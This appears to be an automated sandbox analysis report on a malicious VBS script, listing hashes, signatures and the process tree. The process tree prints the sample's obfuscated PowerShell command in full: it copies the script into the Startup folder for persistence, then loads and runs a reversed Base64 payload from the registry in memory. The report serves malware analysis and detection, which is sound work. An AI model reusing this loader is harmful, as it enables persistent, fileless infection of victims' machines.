Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/03/2025, 02:31
Static task
static1
Behavioral task
behavioral1
Sample
6e1bd325025c71cf2c20c9579dd80504b327794960f5904a308ce74936a4bde6.vbs
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
6e1bd325025c71cf2c20c9579dd80504b327794960f5904a308ce74936a4bde6.vbs
-
Size
106KB
-
MD5
0a499888377f40a43d7307bafa8cbd30
-
SHA1
82123a74391172f0b0d823b427b104661d0e6a33
-
SHA256
6e1bd325025c71cf2c20c9579dd80504b327794960f5904a308ce74936a4bde6
-
SHA512
dabcfa799a990d0ca8cede290e75bf76133a0c9cb157e2aa614145b4cc6bda7319b6e33c9d4f44fc7f97ae6e01aa30a123c6ca7ebb8bfc04da89d6dc14cd4052
-
SSDEEP
3072:4qBpaqQCcV4IptJpeCIxebt/uuqBPc+4wd4/w2ElZoaf:PpDyVptJX/hlQt4wdyalZoC
Score
6/10
Malware Config
Signatures
-
pid Process 2668 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2892 wrote to memory of 2668 2892 WScript.exe 30 PID 2892 wrote to memory of 2668 2892 WScript.exe 30 PID 2892 wrote to memory of 2668 2892 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e1bd325025c71cf2c20c9579dd80504b327794960f5904a308ce74936a4bde6.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\6e1bd325025c71cf2c20c9579dd80504b327794960f5904a308ce74936a4bde6.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\testfud.exe.vbs'; $Laws = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $Laws = -join $Laws[-1..-$Laws.Length];[<##>AppDomain<##>]::<##>('womanconqueredurrentDomain'.replace('womanconquered','C'))<##>.<##>('gynecocracyoad'.replace('gynecocracy','L'))([Convert]::FromBase64String($Laws))<##>.<##>('insurmountablenessntryPoint'.replace('insurmountableness','E'))<##>.<##>('Inbottlegreenoke'.replace('bottlegreen','v'))($Null,$Null)<##>;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-